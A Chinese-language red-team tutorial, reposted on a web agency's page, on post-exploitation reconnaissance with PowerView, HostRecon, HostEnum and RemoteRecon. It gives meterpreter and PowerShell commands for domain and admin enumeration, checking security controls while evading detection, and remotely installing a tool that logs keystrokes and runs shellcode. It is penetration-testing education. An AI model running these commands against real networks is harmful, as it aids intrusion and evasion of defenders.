资讯

精准传达 • 有效沟通

从品牌网站建设到网络营销策划,从策略到执行的一站式服务

PowerView脚本怎么用-创新互联

本篇文章为大家展示了PowerView脚本怎么用,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

十余年建站经验, 成都网站建设、网站设计客户的见证与正确选择。创新互联公司提供完善的营销型网页建站明细报价表。后期开发更加便捷高效,我们致力于追求更美、更快、更规范。

传统的内部侦察测试使用Windows内置命令,如net view、net user等,以获取主机和域信息。因为蓝色团队可以监视这些命令并触发警报。所以使用其他方法,如PowerShell和WMI,避免在环境探索的过程中被检测。

PowerView
PowerView是由Will Schroeder开发的PowerShell脚本,是PowerSploit框架和Empire的一部分。该脚本仅依赖于PowerShell和WMI (Windows管理工具)进行查询。从现有的meterpreter会话PowerView中可以加载和执行以下命令来检索关于域的信息:
meterpreter > load powershell
meterpreter > powershell_import /root/Desktop/PowerView.ps1
meterpreter > powershell_execute Get-NetDomain
PowerView有各种各样的cmdlet,可以发现本地管理员。
meterpreter > powershell_execute Invoke-EnumerateLocalAdmin
Invoke-UserHunter可以帮助扩展网络访问,因为它可以识别用户登录的系统,并且可以验证当前用户是否有本地管理员访问这些主机。
PS > Invoke-UserHunter
PowerView包含多个cmdlet,还可以检索域信息。
PS > Get-NetForest
还有一些模块可以执行基于主机的枚举。
(Empire: xx) > usemodule situational_awareness/host/winenum
(Empire: powershell/situational_awareness/host/winenum) > info
另外还有一个PowerView的Python实现,如果提供了凭证,它可以在不属于域内的主机上执行。
#./pywerver.py get-netshare -w PENTESTLAB -u test -p Password123 --computername WIN-PTELU2U07KG
https://github.com/PowerShellMafia/PowerSploit

HostRecon
还有一个PowerShell脚本可以自动执行主机中的环境探索任务。Beau Bullock开发了HostRecon并可以使用PowerShell和WMI查询从主机检索各种信息以逃避检测。HostRecon可以枚举本地用户和主机的本地管理员。该脚本将执行一系列检查,以确定防火墙状态、安装的防病毒解决方案(如果使用了LAPS)和应用程序白化产品。因为保持隐形是红队评估的首要任务,获得这方面的知识对于在这一阶段和以后使用的闪避行动是必不可少的。该脚本还会尝试识别域名密码策略,域控制器和域管理员等域名信息。
meterpreter > powershell_import /root/Desktop/HostRecon.ps1
meterpreter > powershell_execute Invoke-HostRecon
https://github.com/dafthack/HostRecon

HostEnum
HostEnum脚本由Andrew Chiles开发在主机上执行时提供详细信息,和HostRecon类似。 HostEnum既可以在本地执行,也可以从内存中执行,并可以以HTML格式生成输出。
meterpreter > load powershell
meterpreter > powershell_import /root/Desktop/HostEnum.ps1
meterpreter > powershell_shell
PS > Invoke-HostEnum -Local -Domain  参数-Domain将执行某些域检查,如检索域用户列表和其他域信息。
https://github.com/threatexpress/red-team-scripts

RemoteRecon
在获得本地管理员凭证并将这些凭证共享到多个主机的场景中,可以使用WMI在远程主机上执行环境探索。RemoteRecon是由Chris Ross开发的,它的目的是允许红色团队在不部署原始植入物的情况下进行侦察。该脚本可以捕获击键和屏幕截图、执行命令和shell代码,还可以加载PowerShell脚本以执行其他任务。在进行任何操作之前,需要首先使用本地管理员凭证将脚本远程安装到主机中,或者如果当前用户已经是目标主机上的本地管理员,则只需要计算机名。
PS C:\> Import-Module .\RemoteRecon.ps1
PS C:\> Install-RemoteRecon -ComputerName 'WIN-2NE38K15TGH'
通过脚本执行的命令的输出可以用-Results参数来检索。
PS C:\> Invoke-PowerShellCmd -ComputerName 'WIN-2NE38K15TGH' -Cmd "ps -name exp" -Verbose
PS C:\> Invoke-PowerShellCmd -ComputerName 'WIN-2NE38K15TGH' -Results


上述内容就是PowerView脚本怎么用,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注创新互联行业资讯频道。

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


网站名称:PowerView脚本怎么用-创新互联
当前URL:http://cdkjz.cn/article/ichds.html
多年建站经验

多一份参考,总有益处

联系快上网,免费获得专属《策划方案》及报价

咨询相关问题或预约面谈,可以通过以下方式与我们联系

大客户专线   成都:13518219792   座机:028-86922220